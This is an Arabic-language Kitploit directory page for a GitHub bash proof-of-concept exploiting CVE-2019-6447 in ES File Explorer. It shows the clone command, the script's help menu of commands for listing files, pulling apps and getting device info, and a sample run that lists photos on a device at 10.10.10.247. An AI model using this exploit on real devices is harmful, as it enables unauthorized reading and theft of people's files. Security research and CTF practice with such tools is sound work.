Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-ES-File-Explorer-CVE-2019-6447 — نص برمجي باش بسيط جداً لاستغلال CVE-2019-6447. | Kitploit
أدوات/GitHubGitHub/julio-cfa/poc-es-file-explorer-cve-2019-6447
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالتسريب البياناتجمع المعلوماتأمن الجوال
GitHubjulio-cfa/poc-es-file-explorer-cve-2019-6447

POC-ES-File-Explorer-CVE-2019-6447

نص برمجي باش بسيط جداً لاستغلال CVE-2019-6447.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

إثبات المفهوم (PoC) لـ ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

هذا تنفيذ بسيط للغاية بلغة bash لإثبات المفهوم (PoC) الخاص بـ CVE-2019-6447. يستخدم بشكل أساسي curl لإرسال الطلبات بالمعاملات الصحيحة. لقد بنيته عندما كنت أبحث عن سكربت مماثل أثناء مشاركتي في تحدي CTF ولم أجد أيًا. يمكنك اللعب بالسكربت الأصلي وتخصيصه بالطريقة التي تفضّلها.

التثبيت:

ببساطة، استنسخ المستودع واستخدم ملف .sh.

root@kitploit:~
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

أو انسخ والصق المحتوى الخام في ملف.

الاستخدام:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

مثال:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

المراجع:

في حال كنت فضوليًا بشأن كيفية عمل هذا الاستغلال خلف الكواليس، أو في حال فشل السكربت واضطررت إلى بناء سكربت خاص بك، يمكنك قراءة الروابط التالية:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

تنزيل الأداة